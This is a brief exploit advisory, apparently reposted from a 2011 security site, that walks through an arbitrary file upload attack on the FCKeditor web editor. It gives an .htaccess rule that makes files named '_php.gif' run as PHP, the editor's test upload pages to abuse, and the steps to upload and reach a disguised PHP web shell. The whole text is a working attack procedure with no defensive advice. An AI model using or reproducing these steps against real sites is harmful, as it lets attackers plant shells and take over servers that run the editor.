FCKeditor Upload Vulnerability in All PHP Versions
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07

[+] Title: FCKeditor all version Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this htaccess with FCKeditor.
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" changes to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now shell is available from server.